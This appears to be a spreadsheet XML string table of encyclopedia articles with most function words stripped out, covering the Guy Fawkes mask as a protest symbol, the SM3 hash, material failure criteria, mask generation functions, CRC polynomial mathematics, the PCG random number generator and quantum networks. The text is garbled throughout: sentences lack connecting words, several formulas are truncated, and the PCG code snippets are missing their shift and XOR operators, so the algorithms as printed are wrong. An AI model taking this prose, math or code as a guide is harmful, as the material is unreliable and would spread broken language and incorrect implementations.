explained, increasingly shown wearing vendetta fawkes mask (though likely reference fact fawkes failed complete gunpowder plot).on april 2006 pair rival groups wearing fawkes masks confronted outside york city offices warner brothers comics. group, freegan adam weismann, protested perceived misrepresentation anarchist movement film vendetta. group, libertarian todd seavey, counter-protested anarchists, wearing masks purportedly supplied time warner employee.in april 2016 anonymous voiceless created; also mask spreading veganism. anonymous mask became associated hacktivism group anonymous's project chanology protests church scientology 2008. group protested church scientology response church forcing youtube pull video cruise discussing scientology meant internal within church. response, anonymous protested litigious methods church scientology period several months. protesters encouraged hide faces, since common practice church members photograph anti-scientology protesters. fawkes mask widely used method hiding faces.as protests continued, protesters began opting fawkes mask, eventually took symbolic status within group. scott stewart university nebraska omaha's gateway wrote: "many participants sported fawkes masks draw attention identity anonymous church scientology's abuse litigation coercion suppress anti-scientology viewpoints." internet-based group adopted character wider protests authority. wider popular protest 2009, protesters wearing mask detonated fake barrel gunpowder outside parliament protesting issue british mps' expenses.during 2011 wisconsin protests, subsequent occupy wall street ongoing occupy movement, mask appeared internationally symbol popular rebellion. october 2011, campaigner julian assange attended occupy london stock exchange protest wearing mask, removed request police. january 2012, fawkes masks used protesters poland's signing acta.on june 2012, mumbai, india, group anonymous members college students gathered azad maidan, dressed black wearing fawkes masks, protest indian government's censorship internet.the mask, used bahraini protesters arab spring-inspired bahraini uprising, banned country february 2013, months similar decision united arab emirates, another persian gulf country. industry commerce ministry bahrain said importing mask, referred "revolution mask", concerns "public safety". decision, described voice america "unusual", marked latest government efforts suppress two-year-old uprising. however, british-based rights activist samuel muston independent downplayed effect ban. manama voice reported mask protests increased following ban.the masks used anti-government protesters thailand 2012, protesters turkey 2013. they also used protests brazil egypt 2013.in 2013, government saudi arabia banned importation masks, said would confiscate found sale. ministry islamic affairs stated mask symbol rebels revenge", warned imams parents "they could used incite youth destabilize security spread chaos ..." september 2013, saudi religious police prohibited wearing fawkes mask, saudi arabia's 83rd national day.the wearing masks riot unlawful assembly banned canada, following enactment bill c-309, carries maximum ten-year prison sentence.participants 2014 venezuelan protests carried wide variety masks; fawkes mask, sometimes painted colours venezuelan flag.in october 2019 protesters hong kong started using mask opposition government's banning masks protests.guy fawkes masks among symbols displayed 2021 storming united states capitol. views moore lloyd alan moore, anarchist author vendetta, supported mask, stated 2008 interview entertainment weekly, also quite heartened watching news demonstrations outside scientology headquarters here, suddenly flashed clip showing demonstrators wearing vendetta fawkes masks. that pleased that gave warm little glow." whilst moore create character purposes served explains guardian, "suppose writing vendetta would secret heart hearts thought: great ideas actually made impact? start idle fantasy intrude regular world it's peculiar. feels like character created years somehow escaped realm fiction."v vendetta illustrator co-creator david lloyd: fawkes mask become common brand convenient placard protest tyranny happy people using seems quite unique, icon popular culture used way. feeling anonymous group needed all-purpose image hide identity also symbolise stand individualism vendetta story person system. knew going escapee concentration camp subjected medical experiments idea craziness would decide adopt persona mission fawkes great historical revolutionary. sales corporate ownership rights according time 2011, protesters' adoption mask becoming top-selling mask amazon.com, selling hundreds thousands year. warner bros. discovery, owns warner bros. comics, owns rights image paid sale official mask. also anti-mask richard nixon mask references further reading external links media related masks fawkes wikimedia commons</t>
  </si>
  <si>
    <t>SM3 (hash function)</t>
  </si>
  <si>
    <t>shangmi (sm3) cryptographic hash function used chinese national standard. published national cryptography administration (chinese: 国家密码管理局) 2010-12-17 "gm/t 0004-2012: cryptographic hash algorithm".sm3 used implementing digital signatures, message authentication codes, pseudorandom number generators. algorithm public considered similar sha-256 security efficiency. used transport layer security. definitive standards defined gm/t 0004-2012: cryptographic hash algorithm gb/t 32905-2016: information security techniques—sm3 cryptographic hash algorithm iso/iec 10118-3:2018—it security techniques—hash-functions—part dedicated hash-functions references also (cipher)</t>
  </si>
  <si>
    <t>Material failure theory</t>
  </si>
  <si>
    <t>material failure theory interdisciplinary field materials science solid mechanics attempts predict conditions solid materials fail action external loads. failure material usually classified brittle failure (fracture) ductile failure (yield). depending conditions (such temperature, state stress, loading rate) materials fail brittle ductile manner both. however, practical situations, material classified either brittle ductile. mathematical terms, failure theory expressed form various failure criteria valid specific materials. failure criteria functions stress strain space separate "failed" states "unfailed" states. precise physical definition "failed" state easily quantified several working definitions engineering community. quite often, phenomenological failure criteria form used predict brittle failure ductile yields. material failure materials science, material failure loss load carrying capacity material unit. this definition introduces fact material failure examined different scales, microscopic, macroscopic. structural problems, structural response beyond initiation nonlinear material behaviour, material failure profound importance determination integrity structure. hand, lack globally accepted fracture criteria, determination structure's damage, material failure, still intensive research. types material failure material failure distinguished broader categories depending scale material examined: microscopic failure microscopic material failure defined terms crack initiation propagation. such methodologies useful gaining insight cracking specimens simple structures well defined global load distributions. microscopic failure considers initiation propagation crack. failure criteria case related microscopic fracture. some popular failure models area micromechanical failure models, combine advantages continuum mechanics classical fracture mechanics. such models based concept plastic deformation, microvoids nucleate grow local plastic neck fracture intervoid matrix occurs, causes coalescence neighbouring voids. such model, proposed gurson extended tvergaard needleman, known gtn. another approach, proposed rousselier, based continuum damage mechanics (cdm) thermodynamics. both models form modification mises yield potential introducing scalar damage quantity, represents void volume fraction cavities, porosity macroscopic failure macroscopic material failure defined terms load carrying capacity energy storage capacity, equivalently. presents classification macroscopic failure criteria four categories: stress strain failure energy type failure (s-criterion, t-criterion) damage failure empirical failurefive general levels considered, meaning deformation failure interpreted differently: structural element scale, macroscopic scale macroscopic stress strain defined, mesoscale represented typical void, microscale atomic scale. material behavior level considered collective behavior sub-level. efficient deformation failure model consistent every level. brittle material failure criteria failure brittle materials determined using several approaches: phenomenological failure criteria linear elastic fracture mechanics elastic-plastic fracture mechanics energy-based methods cohesive zone methods phenomenological failure criteria failure criteria developed brittle solids maximum stress/strain criteria. maximum stress criterion assumes material fails maximum principal stress {\displaystyle \sigma _{1}} material element exceeds uniaxial tensile strength material. alternatively, material fail minimum principal stress {\displaystyle \sigma _{3}} less uniaxial compressive strength material. uniaxial tensile strength material {\displaystyle \sigma _{t}} uniaxial compressive strength {\displaystyle \sigma _{c}} safe region material assumed {\displaystyle \sigma _{c}&lt;\sigma _{3}&lt;\sigma _{1}&lt;\sigma _{t}\,} note convention tension positive used expression. maximum strain criterion similar form except principal strains compared experimentally determined uniaxial strains failure, i.e., {\displaystyle \varepsilon _{c}&lt;\varepsilon _{3}&lt;\varepsilon _{1}&lt;\varepsilon _{t}\,} maximum principal stress strain criteria continue widely used spite severe shortcomings. numerous phenomenological failure criteria found engineering literature. degree success criteria predicting failure limited. some popular failure criteria various type materials are: criteria based invariants cauchy stress tensor tresca maximum shear stress failure criterion mises maximum elastic distortional energy criterion mohr-coulomb failure criterion cohesive-frictional solids drucker-prager failure criterion pressure-dependent solids bresler-pister failure criterion concrete willam-warnke failure criterion concrete hankinson criterion, empirical failure criterion used orthotropic materials wood hill yield criteria anisotropic solids tsai-wu failure criterion anisotropic composites johnson–holmquist damage model high-rate deformations isotropic solids hoek-brown failure criterion rock masses cam-clay failure theory soil linear elastic fracture mechanics approach taken linear elastic fracture mechanics estimate amount energy needed grow preexisting crack brittle material. earliest fracture mechanics approach unstable crack growth griffiths' theory. when applied mode opening crack, griffiths' theory predicts critical stress {\displaystyle \sigma needed propagate crack given {\displaystyle \sigma ={\sqrt {\cfrac {2e\gamma }{\pi a}}}} {\displaystyle young's modulus material, {\displaystyle \gamma surface energy unit area crack, {\displaystyle crack length edge cracks {\displaystyle crack length plane cracks. quantity {\displaystyle \sigma {\sqrt {\pi a}}} postulated material parameter called fracture toughness. mode fracture toughness plane strain defined {\displaystyle k_{\rm {ic}}=y\sigma _{c}{\sqrt {\pi a}}} {\displaystyle \sigma _{c}} critical value field stress {\displaystyle dimensionless factor depends geometry, material properties, loading condition. quantity {\displaystyle k_{\rm {ic}}} related stress intensity factor determined experimentally. similar quantities {\displaystyle k_{\rm {iic}}} {\displaystyle k_{\rm {iiic}}} determined mode model loading conditions. state stress around cracks various shapes expressed terms stress intensity factors. linear elastic fracture mechanics predicts crack extend stress intensity factor crack greater fracture toughness material. therefore, critical applied stress also determined stress intensity factor crack known. energy-based methods linear elastic fracture mechanics method difficult apply anisotropic materials (such composites) situations loading geometry complex. strain energy release rate approach proved quite useful situations. strain energy release rate mode crack runs thickness plate defined {\displaystyle g_{i}={\cfrac {p}{2t}}~{\cfrac {du}{da}}} {\displaystyle applied load, {\displaystyle thickness plate, {\displaystyle displacement point application load crack growth, {\displaystyle crack length edge cracks {\displaystyle crack length plane cracks. crack expected propagate strain energy release rate exceeds critical value {\displaystyle g_{\rm {ic}}} called critical strain energy release rate. fracture toughness critical strain energy release rate plane stress related {\displaystyle g_{\rm {ic}}={\cfrac {1}{e}}~k_{\rm {ic}}^{2}} {\displaystyle young's modulus. initial crack size known, critical stress determined using strain energy release rate criterion. ductile material failure (yield) criteria yield criterion often expressed yield surface, yield locus, hypothesis concerning limit elasticity combination stresses. there interpretations yield criterion: purely mathematical taking statistical approach models attempt provide justification based established physical principles. since stress strain tensor qualities described basis three principal directions, case stress denoted {\displaystyle \sigma _{1}\,\!} {\displaystyle \sigma _{2}\,\!} {\displaystyle \sigma _{3}\,\!} following represent common yield criterion applied isotropic material (uniform properties directions). other equations proposed used specialist situations. isotropic yield criteria maximum principal stress theory william rankine (1850). yield occurs largest principal stress exceeds uniaxial tensile yield strength. although criterion allows quick easy comparison experimental data rarely suitable design purposes. this theory gives good predictions brittle materials. maximum principal strain theory st.venant. yield occurs maximum principal strain reaches strain corresponding yield point simple tensile test. terms principal stresses determined equation: maximum shear stress theory also known tresca yield criterion, french scientist henri tresca. this assumes yield occurs shear stress {\displaystyle \tau exceeds shear yield strength {\displaystyle \tau _{y}\!} total strain energy theory this theory assumes stored energy associated elastic deformation point yield independent specific stress tensor. thus yield occurs strain energy unit volume greater strain energy elastic limit simple tension. 3-dimensional stress state given maximum distortion energy theory (von mises yield criterion) also referred octahedral shear stress theory. this theory proposes total strain energy separated components: volumetric (hydrostatic) strain energy shape (distortion shear) strain energy. proposed yield occurs distortion component exceeds yield point simple tensile test. this theory also known mises yield criterion. yield surfaces corresponding criteria range forms. however, isotropic yield criteria correspond convex yield surfaces. anisotropic yield criteria when metal subjected large plastic deformations grain sizes orientations change direction deformation. result, plastic yield behavior material shows directional dependency. under circumstances, isotropic yield criteria mises yield criterion unable predict yield behavior accurately. several anisotropic yield criteria developed deal situations. some popular anisotropic yield criteria are: hill's quadratic yield criterion generalized hill yield criterion hosford yield criterion yield surface yield surface ductile material usually changes material experiences increased deformation. models evolution yield surface increasing strain, temperature, strain rate used conjunction failure criteria isotropic hardening, kinematic hardening, viscoplasticity. some models are: johnson-cook model steinberg-guinan model zerilli-armstrong model mechanical threshold stress model preston-tonks-wallace modelthere another important aspect ductile materials prediction ultimate failure strength ductile material. several models predicting ultimate strength used engineering community varying levels success. metals, failure criteria usually expressed terms combination porosity strain failure terms damage parameter. also fracture mechanics fracture stress intensity factor yield (engineering) yield surface plasticity (physics) structural failure strength materials ultimate failure damage mechanics size effect structural strength concrete fracture analysis references</t>
  </si>
  <si>
    <t>Mask generation function</t>
  </si>
  <si>
    <t>mask generation function (mgf) cryptographic primitive similar cryptographic hash function except hash function's output fixed size, supports output variable length. respect, viewed single-use function: accept input length process produce output length. mask generation functions completely deterministic: given input desired output length output always same. definition mask generation function takes octet string variable length desired output length input, outputs octet string desired length. there restrictions length input output octet strings, bounds generally large. mask generation functions deterministic; octet string output completely determined input octet string. output mask generation function pseudorandom, seed function unknown, infeasible distinguish output truly random string. applications mask generation functions, generalizations hash functions, useful wherever hash functions are. however, desirable cases fixed-size hash would inadequate. examples include generating padding, producing one-time pads keystreams symmetric-key encryption, yielding outputs pseudorandom number generators. padding schemes mask generation functions first proposed part specification padding rsa-oaep algorithm. oaep algorithm required cryptographic hash function could generate output equal size "data block" whose length proportional arbitrarily sized input message. random number generators nist special publication 800-90a defines class cryptographically secure random number generators, "hash drbg", uses hash function counter produce requested sequence random bits equal size requested number random bits. examples perhaps common straightforward mechanism build iteratively apply hash function together incrementing counter value. counter incremented indefinitely yield output blocks sufficient amount output collected. this approach used mgf1. mgf1 mgf1 mask generation function defined public cryptography standard published laboratories: options {\displaystyle {\mathsf {hash}}} hash function {\displaystyle {\mathsf {hlen}}} denotes length octets hash function output) input {\displaystyle seed mask generated, octet string {\displaystyle intended length octets mask, {\displaystyle 2^{32}({\mathsf {hlen}})} output {\displaystyle {\mathsf {mask}}} mask, octet string length {\displaystyle "mask long" steps example code below python3 code implementing mgf1: example outputs mgf1: references</t>
  </si>
  <si>
    <t>Mathematics of cyclic redundancy checks</t>
  </si>
  <si>
    <t>cyclic redundancy check (crc) based division ring polynomials finite field gf(2) (the integers modulo polynomials coefficient either zero one, arithmetic operations wrap around. string bits interpreted coefficients message polynomial sort, find crc, multiply message polynomial {\displaystyle x^{n}} find remainder dividing degree- {\displaystyle generator polynomial. coefficients remainder polynomial bits crc. maths general, computation corresponds euclidean division polynomials gf(2): {\displaystyle m(x)\cdot x^{n}=q(x)\cdot g(x)+r(x).} here {\displaystyle m(x)} original message polynomial {\displaystyle g(x)} degree- {\displaystyle generator polynomial. bits {\displaystyle m(x)\cdot x^{n}} original message {\displaystyle zeroes added end. 'checksum' formed coefficients remainder polynomial {\displaystyle r(x)} whose degree strictly less {\displaystyle quotient polynomial {\displaystyle q(x)} interest. using modulo operation, stated {\displaystyle r(x)=m(x)\cdot x^{n}\,{\bmod {\,}}g(x).} communication, sender attaches {\displaystyle bits original message bits could shown equivalent sending {\displaystyle m(x)\cdot x^{n}-r(x)} (the codeword.) receiver, knowing {\displaystyle g(x)} therefore {\displaystyle separates repeats calculation, verifying received computed equal. are, receiver assumes received message bits correct. practice calculations closely resemble long division binary, except subtractions involved borrow significant digits, thus become exclusive operations. checksum strict mathematical sense, expressed weighted modulo-2 per-bit syndromes, word generally reserved specifically sums computed using larger moduli, 256, 65535. crcs also used part error-correcting codes, allow detection transmission errors, reconstruction correct message. these codes based closely related mathematical principles. polynomial arithmetic modulo since coefficients constrained single bit, math operation polynomials must coefficients result either zero one. example, addition: {\displaystyle (x^{3}+x)+(x+1)=x^{3}+2x+1\equiv x^{3}+1{\pmod {2}}.} note {\displaystyle equivalent zero equation addition coefficients performed modulo {\displaystyle 2x=x+x=x\times (1+1)\equiv x\times 0=0{\pmod {2}}.} polynomial addition modulo bitwise xor. since inverse itself, polynominal subtraction modulo bitwise too. multiplication similar carry-less product): {\displaystyle (x^{2}+x)(x+1)=x^{3}+2x^{2}+x\equiv x^{3}+x{\pmod {2}}.} also divide polynomials find quotient remainder. example, suppose we're dividing {\displaystyle x^{3}+x^{2}+x} {\displaystyle x+1} would find {\displaystyle {\frac {x^{3}+x^{2}+x}{x+1}}=(x^{2}+1)-{\frac {1}{x+1}}.} words, {\displaystyle (x^{3}+x^{2}+x)=(x^{2}+1)(x+1)-1\equiv (x^{2}+1)(x+1)+1{\pmod {2}}.} division yields quotient remainder which, since odd, last equations, {\displaystyle x^{3}+x^{2}+x} represents original message bits 111, {\displaystyle x+1} generator polynomial, remainder {\displaystyle (equivalently, {\displaystyle x^{0}} crc. degree generator polynomial first multiplied message {\displaystyle x^{1}} {\displaystyle x^{3}+x^{2}+x} variations there several standard variations crcs, used polynomial. implementation variations endianness presentation affect mapping strings coefficients {\displaystyle m(x)} {\displaystyle r(x)} impact properties algorithm. check crc, instead calculating message comparing crc, calculation entire codeword. result (called residual) zero, check passes. this works codeword {\displaystyle m(x)\cdot x^{n}-r(x)=q(x)\cdot g(x)} always divisible {\displaystyle g(x)} .this simplifies many implementations avoiding need treat last bytes message specially checking crcs.the shift register initialized ones instead zeroes. this equivalent inverting first {\displaystyle bits message feeding algorithm. equation becomes {\displaystyle m(x)\cdot x^{n}+\sum _{i=m}^{m+n-1}x^{i}=q(x)\cdot g(x)+r(x)} {\displaystyle m&gt;\deg(m(x))} length message bits. change imposes {\displaystyle r(x)} function generating polynomial message length, {\displaystyle \left(\sum _{i=m}^{m+n-1}x^{i}\right)\,{\bmod {\,}}g(x)} .the reason method used unmodified distinguish messages differ number leading zeroes, leading zeroes affect value {\displaystyle m(x)} when inversion done, distinguish messages.the inverted appended message stream. while unmodified distinguishes messages {\displaystyle m(x)} different numbers trailing zeroes, detect trailing zeroes appended remainder itself. this valid codewords multiples {\displaystyle g(x)} {\displaystyle times codeword also multiple. fact, precisely first variant described works.)in practice, last variations invariably used together. they change transmitted crc, must implemented transmitter receiver. while presetting shift register ones straightforward ends, inverting affects receivers implementing first variation, full codeword already includes longer zero. instead, fixed non-zero pattern, inversion pattern {\displaystyle ones. thus checked either obvious method computing message, inverting comparing message stream, calculating entire codeword comparing expected fixed value {\displaystyle c(x)} called check polynomial, residue magic number. this computed {\displaystyle c(x)=\left(\sum _{i=n}^{2n-1}x^{i}\right)\,{\bmod {\,}}g(x)} equivalently computing unmodified message consisting {\displaystyle ones, {\displaystyle m(x)=\sum _{i=0}^{n-1}x^{i}} these inversions extremely common universally performed, even case crc-32 crc-16-ccitt polynomials. reversed representations reciprocal polynomials polynomial representations example ccitt 16-bit polynomial forms described (bits inside square brackets included word representation; bits outside implied bits; vertical bars designate nibble boundaries): coefficient normal nibbles normal 0x1021 reverse nibbles reverse 0x8408 reciprocal nibbles reciprocal 0x0811 reverse reciprocal koopman nibbles 0x8810 well-known generator polynomials degree {\displaystyle common hexadecimal representations. cases, coefficient {\displaystyle x^{n}} omitted understood msbit-first representation hexadecimal number {\displaystyle bits, least significant always significant represents coefficient {\displaystyle x^{n-1}} least significant represents coefficient {\displaystyle x^{0}} lsbit-first representation hexadecimal number {\displaystyle bits, significant always significant represents coefficient {\displaystyle x^{0}} least significant represents coefficient {\displaystyle x^{n-1}} .the msbit-first form often referred literature normal representation, lsbit-first called reversed representation. essential correct form implementing crc. coefficient {\displaystyle x^{n-1}} happens zero, forms distinguished glance seeing set. confuse matter, paper koopman chakravarty converts generator polynomials hexadecimal numbers another way: msbit-first, including {\displaystyle x^{n}} coefficient omitting {\displaystyle x^{0}} coefficient. this "koopman" representation advantage degree determined hexadecimal form coefficients easy read left-to-right order. however, used anywhere else recommended risk confusion. reciprocal polynomials reciprocal polynomial created assigning {\displaystyle x^{i}} {\displaystyle x^{0}} coefficients polynomial {\displaystyle x^{0}} {\displaystyle x^{i}} coefficients polynomial. that reciprocal degree {\displaystyle polynomial {\displaystyle g(x)} {\displaystyle x^{n}g(x^{-1})} interesting property reciprocal polynomials, used crcs, exactly error-detecting strength polynomials reciprocals reciprocal polynomial generates codewords, reversed first {\displaystyle bits codeword original polynomial taken, reversed used message, message reciprocal polynomial equals reverse first {\displaystyle bits original codeword. reciprocal polynomial original polynomial, crcs generated using (even modulo reversal) generated original polynomial. error detection strength error-detection ability depends degree polynomial specific polynomial used. "error polynomial" {\displaystyle e(x)} symmetric difference received message codeword correct message codeword. error undetected algorithm error polynomial divisible polynomial. because based division, polynomial detect errors consisting string zeroes prepended data, missing leading zeroes. however, variations. single errors detected polynomial least terms non-zero coefficients. error polynomial {\displaystyle x^{k}} {\displaystyle x^{k}} divisible polynomials {\displaystyle x^{i}} {\displaystyle i\leq errors separated distance less order primitive polynomial factor generator polynomial detected. error polynomial case {\displaystyle e(x)=x^{i}+x^{k}=x^{k}\cdot (x^{i-k}+1),\;i&gt;k} noted above, {\displaystyle x^{k}} term divisible polynomial, leaves {\displaystyle x^{i-k}+1} term. definition, smallest value {\displaystyle {i-k}} polynomial divides {\displaystyle x^{i-k}+1} polynomial's order exponent. polynomials largest order called primitive polynomials, polynomials degree {\displaystyle binary coefficients, order {\displaystyle 2^{n}-1} errors number bits detected polynomial multiple {\displaystyle x+1} this equivalent polynomial even number terms non-zero coefficients. this capacity assumes generator polynomial product {\displaystyle x+1} primitive polynomial degree {\displaystyle n-i} since primitive polynomials except {\displaystyle x+1} number non-zero coefficients. burst errors length {\displaystyle detected polynomial degree {\displaystyle greater non-zero {\displaystyle x^{0}} term.(as aside, never reason polynomial zero {\displaystyle x^{0}} term. recall remainder message polynomial times {\displaystyle x^{n}} divided polynomial. polynomial zero {\displaystyle x^{0}} term always {\displaystyle factor. {\displaystyle k(x)} original polynomial {\displaystyle k(x)=x\cdot k'(x)} {\displaystyle m(x)\cdot x^{n-1}=q(x)\cdot k'(x)+r(x)} {\displaystyle m(x)\cdot x^{n}=q(x)\cdot x\cdot k'(x)+x\cdot r(x)} {\displaystyle m(x)\cdot x^{n}=q(x)\cdot k(x)+x\cdot r(x)} that message {\displaystyle k(x)} polynomial message {\displaystyle k'(x)} polynomial zero appended. waste bit.) combination factors means good polynomials often primitive polynomials (which best 2-bit error detection) primitive polynomials degree {\displaystyle n-1} multiplied {\displaystyle x+1} (which detects numbers errors, half two-bit error detection ability primitive polynomial degree {\displaystyle bitfilters analysis technique using bitfilters allows efficiently determine properties given generator polynomial. results following: burst errors (but one) length longer generator polynomial detected generator polynomial {\displaystyle 1+\cdots +x^{n}} this includes 1-bit errors (burst length maximum length {\displaystyle n+1} {\displaystyle degree generator polynomial (which length {\displaystyle n+1} exception result pattern generator polynomial. uneven errors detected generator polynomials even number terms. 2-bit errors (multiple) distance longest bitfilter even parity generator polynomial detected; others detected. degrees optimal generator polynomial degree even number terms; case period mentioned {\displaystyle 2^{n-1}-1} {\displaystyle n=16} means blocks 32,767 bits length contain undiscovered 2-bit errors. uneven number terms generator polynomial period {\displaystyle 2^{n}-1} however, generator polynomials (with number terms) discover number errors, avoided. list corresponding generators even number terms found link mentioned beginning section. single errors within bitfilter period mentioned (for even terms generator polynomial) identified uniquely residual. method used correct single-bit errors well (within limits, e.g. 32,767 bits optimal generator polynomials degree 16). since errors leave residual, even even residual, 1-bit errors 2-bit errors distinguished. however, like secded techniques, crcs cannot always distinguish 1-bit errors 3-bit errors. when errors occur block, error correction erroneous produce errors. also barrett reduction error correcting code list checksum algorithms parity (telecommunication) polynomial representations cyclic redundancy checks references external links</t>
  </si>
  <si>
    <t>Permuted congruential generator</t>
  </si>
  <si>
    <t>permuted congruential generator (pcg) pseudorandom number generation algorithm developed 2014 applies output permutation function improve statistical properties modulo-2n linear congruential generator. achieves excellent statistical performance small fast code, small state size.a differs classical linear congruential generator (lcg) three ways: modulus state larger, usually twice size desired output, uses power-of-2 modulus, results particularly efficient implementation full period generator unbiased output bits, state output directly, rather significant bits state used select bitwise rotation shift applied state produce output.it variable rotation eliminates problem short period low-order bits power-of-2 lcgs suffer from.: 31–34 variants family includes number variants. core defined widths bits, although bits recommended practical use; smaller sizes statistical tests technique. additive constant varied produce different streams. constant arbitrary integer, need stored explicitly; address state variable (with set) used. there several different output transformations defined. perform well, larger margin others.: they built following components: random (input-dependent) rotation, output half size input. given 2b-bit input word, bits used rotate amount, next-most-significant 2b−1 bits rotated right used output, 2b−1+1−b bits discarded. random (input-dependent) shift, cases rotates expensive. again, output half size input. beginning 2b-bit input word, bits used shift amount, applied next-most-significant 2b−1+2b−3−1 bits, least significant 2b−1 bits result output. 2b−1−2b−3−b+4 bits discarded. xsh: xorshift operation, constant. constant chosen half bits discarded next operation (rounded down). xsl: simplified version xorshift, folding value half xoring high half low. folded value used subsequent rotations. rxs: xorshift random (input-dependent) amount. multiply fixed constant.these combined following recommended output transformations, illustrated common sizes: xsh-rr: xorshift mixes high-order bits down, bits 63–59 select rotate amount applied bits 27–58. (64→32 bits) count (int)(x 59); return rotr32((uint32_t)(x 27), count);. xsh-rs: similar, fewer bits select shift amount. (64→32 bits) count (int)(x 61); return (uint32_t)(x count));. xsl-rr: simplified version xsh-rr, optimized 128-bit states implemented using words 64-bit machines. (128→64 bits) count (int)(x 122); (uint64_t)(x 64)); return rotr64(x64, count); rxs-m-xs: slowest strongest output transformation used produce half-size output, becomes weakest used intended, produce output size state. state size must limited bits. (32→32 bits) count=(int)(x 28); count); 277803737u; return 22); (64→64 bits) count=(int)(x 59); count); 12605985483714917081u; return 43); xsl-rr-rr: similar preceding, turns bits state bits output, application demands (128→128 bits) count (int)(x 122); low64 rotr64((uint64_t)(x 64)), count); high64 rotr64((uint64_t)(x 64), low64 63); return (uint128_t)high64 low64;each step output transformations either invertible (and thus one-to-one) truncation, composition maps fixed number input states output value. this preserves equidistribution underlying lcg. finally, cycle length longer 2128 required, generator extended array sub-generators. chosen rotation) added main generator's output, every time main generator's state reaches zero, sub-generators cycled pattern provides period exponential total state size. example code generator recommended users: pcg-xsh-rr 64-bit state 32-bit output. implemented generator applies output transformation initial state rather final state order increase available instruction-level parallelism maximize performance modern superscalar processors.: slightly faster version eliminates increment, reducing multiplicative (lehmer-style) generator period 262, uses weaker xsh-rs output function: time saving minimal, expensive operation (the 64×64-bit multiply) remains, normal version preferred except extremis. still, faster version also passes statistical tests.when executing 32-bit processor, 64×64-bit multiply must implemented using three 32×32→64-bit multiply operations. reduce two, 32-bit multipliers perform almost well 64-bit one, 0xf13283ad, 0xffffffff0e703b65 0xf2fc5985. comparison pseudorandom number generators melissa o'neill proposes testing prngs applying statistical tests reduced-size variants determining minimum number internal state bits required pass. testu01's bigcrush examines enough data detect period 235, even ideal generator requires bits state pass some poor generators pass given large enough state; passing despite small state measure algorithm's quality, shows large safety margin exists lower limit state size used practical applications. pcg-rxs-m-xs (with 32-bit output) passes bigcrush bits state (the minimum possible), pcg-xsh-rr (pcg32() above) requires pcg-xsh-rs (pcg32_fast() above) requires bits state. comparison, xorshift*, best alternatives, requires bits state,: mersenne twister fails despite 19937 bits state. prediction seed-recovery shown practically possible (with large computation) recover seed pseudo-random generator given consecutive output bytes. this implies practically possible predict rest pseudo-random stream given bytes. also full cycle xoroshiro128+, xoroshiro128**, xoshiro256+, xoshiro256** family competitors references external links pcg, family better random number generators website pcg, family better random number generators inspired /r/programming! reddit discussion author</t>
  </si>
  <si>
    <t>Quantum network</t>
  </si>
  <si>
    <t>quantum networks form important element quantum computing quantum communication systems. quantum networks facilitate transmission information form quantum bits, also called qubits, physically separated quantum processors. quantum processor small quantum computer able perform quantum logic gates certain number qubits. quantum networks work similar classical networks. main difference quantum networking, like quantum computing, better solving certain problems, modeling quantum systems. basics quantum networks computation networked quantum computing distributed quantum computing works linking multiple quantum processors quantum network sending qubits in-between them. doing creates quantum computing cluster therefore creates computing potential. less powerful computers linked create powerful processor. this analogous connecting several classical computers form computer cluster classical computing. like classical computing, system scalable adding quantum computers network. currently quantum processors separated short distances. quantum networks communication realm quantum communication, wants send qubits quantum processor another long distances. this way, local quantum networks intra connected quantum internet. quantum internet supports many applications, derive power fact creating quantum entangled qubits, information transmitted remote quantum processors. most applications quantum internet require modest quantum processors. quantum internet protocols, quantum distribution quantum cryptography, sufficient processors capable preparing measuring single qubit time. this contrast quantum computing interesting applications realized (combined) quantum processors easily simulate qubits classical computer (around 60). quantum internet applications require small quantum processors, often single qubit, quantum entanglement already realized qubits. simulation entangled quantum system classical computer cannot simultaneously provide security speed. overview elements quantum network basic structure quantum network generally quantum internet analogous classical network. first, nodes applications ultimately run. these nodes quantum processors least qubit. some applications quantum internet require quantum processors several qubits well quantum memory nodes. second, transport qubits node another, need communication lines. purpose quantum communication, standard telecom fibers used. networked quantum computing, quantum processors linked short distances, different wavelengths chosen depending exact hardware platform quantum processor. third, make maximum communication infrastructure, requires optical switches capable delivering qubits intended quantum processor. these switches need preserve quantum coherence, makes challenging realize standard optical switches. finally, requires quantum repeater transport qubits long distances. repeaters appear in-between nodes. since qubits cannot copied, classical signal amplification possible. necessity, quantum repeater works fundamentally different classical repeater. elements quantum network nodes: quantum processors nodes receive emit information. telecommunication lasers parametric down-conversion combined photodetectors used quantum distribution. case, nodes many cases simple devices consisting beamsplitters photodetectors. however, many protocols sophisticated nodes desirable. these systems provide advanced processing capabilities also used quantum repeaters. their chief advantage store retransmit quantum information without disrupting underlying quantum state. quantum state stored either relative spin electron magnetic field energy state electron. they also perform quantum logic gates. realizing nodes using color centers diamond, nitrogen-vacancy center. this system forms small quantum processor featuring several qubits. centers utilized room temperatures. small scale quantum algorithms quantum error correction already demonstrated system, well ability entangle three quantum processors, perform deterministic quantum teleportation.another possible platform quantum processors based traps, utilize radio-frequency magnetic fields lasers. multispecies trapped-ion node network, photons entangled parent atom used entangle different nodes. also, cavity quantum electrodynamics (cavity qed) possible method this. cavity qed, photonic quantum states transferred atomic quantum states stored single atoms contained optical cavities. this allows transfer quantum states single atoms using optical fiber addition creation remote entanglement distant atoms. communication lines: physical layer over long distances, primary method operating quantum networks optical networks photon-based qubits. this optical networks reduced chance decoherence. optical networks advantage able re-use existing optical fiber. alternately, free space networks implemented transmit quantum information atmosphere vacuum. fiber optic networks optical networks using existing telecommunication fiber implemented using hardware similar existing telecommunication equipment. this fiber either single-mode multi-mode, multi-mode allowing precise communication. sender, single photon source created heavily attenuating standard telecommunication laser mean number photons pulse less receiving, avalanche photodetector used. various methods phase polarization control used interferometers beam splitters. case entanglement based protocols, entangled photons generated spontaneous parametric down-conversion. cases, telecom fiber multiplexed send non-quantum timing control signals. free space networks free space quantum networks operate similar fiber optic networks rely line sight communicating parties instead using fiber optic connection. free space networks typically support higher transmission rates fiber optic networks account polarization scrambling caused optical fiber. however, long distances, free space communication subject increased chance environmental disturbance photons.free space communication also possible satellite ground. quantum satellite capable entanglement distribution distance 1,203 demonstrated. experimental exchange single photons global navigation satellite system slant distance 20,000 also reported. these satellites play important role linking smaller ground-based networks larger distances. repeaters long-distance communication hindered effects signal loss decoherence inherent transport mediums optical fiber. classical communication, amplifiers used boost signal transmission, quantum network amplifiers cannot used since qubits cannot copied known no-cloning theorem. that implement amplifier, complete state flying qubit would need determined, something unwanted impossible. trusted repeaters intermediary step allows testing communication infrastructure trusted repeaters. importantly, trusted repeater cannot used transmit qubits long distances. instead, trusted repeater used perform quantum distribution additional assumption repeater trusted. consider nodes trusted repeater middle. perform quantum distribution generate {\displaystyle 